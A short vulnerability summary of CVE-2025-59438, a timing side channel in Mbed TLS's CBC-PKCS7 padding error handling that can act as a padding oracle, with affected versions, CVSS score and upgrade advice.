CVE-2025-59438: 
Mbed TLS vulnerability analysis and mitigation

Mbed TLS through version 3.6.4 contains an Observable Timing Discrepancy vulnerability (CVE-2025-59438). The vulnerability was discovered by Beat Heeb from Oberon microsystems AG and was disclosed on October 15, 2025. The issue affects all versions of Mbed TLS up to 3.6.4, while version 3.6.5 and later versions are not affected (Mbed Advisory).

The vulnerability is related to timing differences in error reporting during padding operations in symmetric encryption modes. In the PSA API, when using the built-in implementation of CBC-PKCS7, the PSA functions (psacipherdecrypt(), psacipherfinish()) perform error code translation that is not constant-time. This allows local unprivileged attackers to observe which error is raised by timing shared resources such as code cache or branch predictor. The vulnerability has been assigned a CVSS v3.1 base score of 5.3 (Medium) with vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N (AttackerKB).

The vulnerability could allow local attackers to recover plaintexts encrypted with CBC-PKCS7 or other symmetric encryption modes using padding when decrypted through the PSA API. Applications using the legacy API to decrypt with padding may also be affected through their own error handling. This creates a potential padding oracle attack scenario where attackers can gain partial information about the plaintext if they can submit ciphertexts for decryption and learn whether the padding is valid (Mbed Advisory).

Users are recommended to upgrade to Mbed TLS 3.6.5 or TF-PSA-Crypto 1.0.0 or above. Applications using mbedtlsciphercrypt() or mbedtlscipherfinish() with CBC or EBC mode with padding should review their error handling and consider switching to the new function mbedtlscipherfinishpadded(). Additionally, applications doing decryption with PSAALGCBCPKCS7 should handle errors carefully if local timing attacks are a concern (Mbed Advisory).